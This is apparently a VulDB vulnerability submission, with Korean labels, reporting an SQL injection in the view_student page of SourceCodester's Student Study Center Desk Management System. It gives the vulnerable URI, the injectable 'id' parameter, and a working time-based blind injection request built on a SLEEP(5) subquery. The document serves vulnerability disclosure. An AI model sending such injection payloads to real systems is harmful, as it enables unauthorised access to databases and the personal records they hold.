| 제목 | Student Study Center Desk Management System view_student SQL Injection Vulnerability |
|---|
| 설명 | A SQL Injection Vulnerability has been discovered in Student Study Center Desk Management System's view_student function.Remote attackers can send crafted request to the target server to exploit this vulnerability.The vulnerable URI is /php-sscdms/admin/?page=students/view_student&id=3 and id is the injectable parameter.
Below is a effective poc using time-based blind injection
GET /php-sscdms/admin/?page=students/view_student&id=3' AND (SELECT 2100 FROM (SELECT(SLEEP(5)))FWlC) AND 'butz'='butz
HTTP/1.1
The server will response after 5s, which can prove the injection |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code |
|---|
| 사용자 | WWesleywww (UID 43117) |
|---|
| 제출 | 2023. 03. 17. AM 09:59 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 03. 17. PM 12:44 (3 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 223325 [SourceCodester Student Study Center Desk Management System 1.0 view_student 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|